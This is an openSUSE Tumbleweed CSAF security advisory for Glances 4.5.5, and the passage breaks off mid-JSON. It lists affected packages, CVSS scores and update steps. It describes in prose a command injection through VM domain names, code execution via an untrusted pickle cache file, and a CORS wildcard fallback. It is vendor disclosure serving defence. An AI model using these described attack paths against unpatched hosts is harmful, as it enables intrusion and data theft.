| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.3 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
17 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.5-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11122",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11122-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46606/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46607 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46607/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-53925 page",
"url": "https://www.suse.com/security/cve/CVE-2026-53925/"
}
],
"title": "glances-common-4.5.5-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-25T00:00:00Z",
"generator": {
"date": "2026-06-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11122-1",
"initial_release_date": "2026-06-25T00:00:00Z",
"revision_history": [
{
"date": "2026-06-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.aarch64",
"product": {
"name": "glances-common-4.5.5-1.1.aarch64",
"product_id": "glances-common-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product_id": "python311-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product_id": "python313-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product_id": "python314-Glances-4.5.5-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.5-1.1.ppc64le",
"product_id": "glances-common-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product_id": "python311-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product_id": "python313-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product_id": "python314-Glances-4.5.5-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.s390x",
"product": {
"name": "glances-common-4.5.5-1.1.s390x",
"product_id": "glances-common-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.5-1.1.s390x",
"product_id": "python311-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.5-1.1.s390x",
"product_id": "python313-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python314-Glances-4.5.5-1.1.s390x",
"product_id": "python314-Glances-4.5.5-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.x86_64",
"product": {
"name": "glances-common-4.5.5-1.1.x86_64",
"product_id": "glances-common-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product_id": "python311-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product_id": "python313-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product_id": "python314-Glances-4.5.5-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64"
},
"product_reference": "glances-common-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x"
},
"product_reference": "glances-common-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64"
},
"product_reference": "glances-common-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python314-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python314-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python314-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python314-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-46606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46606"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances - commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46606",
"url": "https://www.suse.com/security/cve/CVE-2026-46606"
},
{
"category": "external",
"summary": "SUSE Bug 1268800 for CVE-2026-46606",
"url": "https://bugzilla.suse.com/1268800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46606"
},
{
"cve": "CVE-2026-46607",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46607"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path - through any of several realistic local or container-level scenarios - can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46607",
"url": "https://www.suse.com/security/cve/CVE-2026-46607"
},
{
"category": "external",
"summary": "SUSE Bug 1268854 for CVE-2026-46607",
"url": "https://bugzilla.suse.com/1268854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46607"
},
{
"cve": "CVE-2026-46608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46608"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46608",
"url": "https://www.suse.com/security/cve/CVE-2026-46608"
},
{
"category": "external",
"summary": "SUSE Bug 1268855 for CVE-2026-46608",
"url": "https://bugzilla.suse.com/1268855"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
